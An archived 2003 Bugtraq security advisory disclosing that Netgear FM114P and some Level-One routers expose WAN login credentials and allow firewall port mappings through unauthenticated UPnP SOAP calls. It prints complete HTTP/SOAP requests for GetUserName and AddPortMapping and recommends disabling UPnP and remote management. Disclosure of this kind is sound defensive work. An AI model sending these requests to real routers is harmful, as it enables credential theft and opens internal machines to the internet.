RE: Another security problem in Netgear FM114P ProSafe Wireless Router firmware (also level-one)

From: Björn Stickler (stickler@rbg.informatik.tu-darmstadt.de)
Date: 04/02/03

  • Next message: David F. Madrid: "Using Java from Javascript"
    From: Björn Stickler <stickler@rbg.informatik.tu-darmstadt.de>
    To: <bugtraq@securityfocus.com>
    Date: Wed, 2 Apr 2003 22:57:57 +0200
    
    

    ADDITION:
    °°°°°°°°°

    it seems that several routers from level-one are also vulnerable to the
    method described.
    and another nice feature is adding port mappings for passing through
    nat-firewall.

    --- sample for passing port 139 (netbios) from internal ip 192.168.0.2: ---

    POST /upnp/service/WANPPPConnection HTTP/1.1
    Content-Type: text/xml; charset="utf-8"
    SOAPAction: "urn:schemas-upnp-org:service:WANPPPConnection:1#AddPortMapping"
    User-Agent: Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x)
    Host: 192.168.0.1
    Content-Length: 1123
    Connection: Keep-Alive
    Pragma: no-cache

    <?xml version="1.0"?>
    <SOAP-ENV:Envelope
    xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"
    SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
    <SOAP-ENV:Body>
    <m:AddPortMapping xmlns:m="urn:schemas-upnp-org:service:WANPPPConnection:1">
    <NewRemoteHost xmlns:dt="urn:schemas-microsoft-com:datatypes"
    dt:dt="string"></NewRemoteHost>
    <NewExternalPort xmlns:dt="urn:schemas-microsoft-com:datatypes"
    dt:dt="ui2">139</NewExternalPort>
    <NewProtocol xmlns:dt="urn:schemas-microsoft-com:datatypes"
    dt:dt="string">TCP</NewProtocol>
    <NewInternalPort xmlns:dt="urn:schemas-microsoft-com:datatypes"
    dt:dt="ui2">139</NewInternalPort>
    <NewInternalClient xmlns:dt="urn:schemas-microsoft-com:datatypes"
    dt:dt="string">192.168.0.6</NewInternalClient>
    <NewEnabled xmlns:dt="urn:schemas-microsoft-com:datatypes"
    dt:dt="boolean">1</NewEnabled>
    <NewPortMappingDescription xmlns:dt="urn:schemas-microsoft-com:datatypes"
    dt:dt="string">NetBios</NewPortMappingDescription>
    <NewLeaseDuration xmlns:dt="urn:schemas-microsoft-com:datatypes"
    dt:dt="ui4">0</NewLeaseDuration>
    </m:AddPortMapping>
    </SOAP-ENV:Body>
    </SOAP-ENV:Envelope>

    regards, b.stickler

    -----Original Message-----
    From: Björn Stickler [mailto:stickler@rbg.informatik.tu-darmstadt.de]
    Sent: Mittwoch, 2. April 2003 19:59
    To: 'bugtraq@securityfocus.com'
    Cc: 'betabugs@netgear.com'

    hi,
    i found another security problem in netgear prosafe wireless router model
    FM114P:
    when remote-access and upnp features are enabled, the WAN connection
    username and password can be retrieved without any authentication using
    upnp. if remote management is enabled anyone can do this from the web. this
    is done by using upnp soap requests to the router with the functions
    GetUserName and GetPassword. i don´t know why such functions exist, because
    router configuration is normally done via web-interface.

    ---- begin of example request to get username --------------

    POST /upnp/service/WANPPPConnection HTTP/1.1
    HOST: 192.168.0.1:80
    SOAPACTION: "urn:schemas-upnp-org:service:WANPPPConnection:1#GetUserName"
    CONTENT-TYPE: text/xml ; charset="utf-8"
    Content-Length: 289

    <?xml version="1.0" encoding="utf-8"?>
    <s:Envelope s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"
    xmlns:s="http://schemas.xmlsoap.org/soap/envelope/">
       <s:Body>
          <u:GetUserName
    xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1" />
       </s:Body>
    </s:Envelope>

    ---- end of example request to get username --------------

    affected firmware versions: --> v1.4 Beta Release 21 has been tested
                                --> all previous versions with upnp may be
    affected

    solution: disable remote management and/or upnp until bug is fixed by
    netgear

    regards, b.stickler

    http://intex.ath.cx


  • Next message: David F. Madrid: "Using Java from Javascript"

    Relevant Pages

    • Re: OT: Vista Licence
      ... It has at least one killer feature - RDP7 performance is massively ... movie in this case) and passing a running bit-image of the screen. ... because there's a standard graphics 'instruction set' and the drivers are ...
      (uk.comp.homebuilt)
    • Re: segfault w/ block, but not file scope
      ... >> specifically as a syntactic feature of a language. ... The phrase "passing a reference" describes the technique in question ... > linked lists, would you insist on not using the term "linked list" in ...
      (comp.lang.c)
    • Re: OT- 2009 Celebrity Deaths
      ... TCM is currently running a short feature with some beautiful music ... showing the passing of popular stars from the past. ...
      (rec.outdoors.rv-travel)
    • Re: Collecting gum ~ the dangers.
      ... "feature". ... have kept them instead of passing them on. ... like dots of gum. ...
      (rec.collecting.stamps.discuss)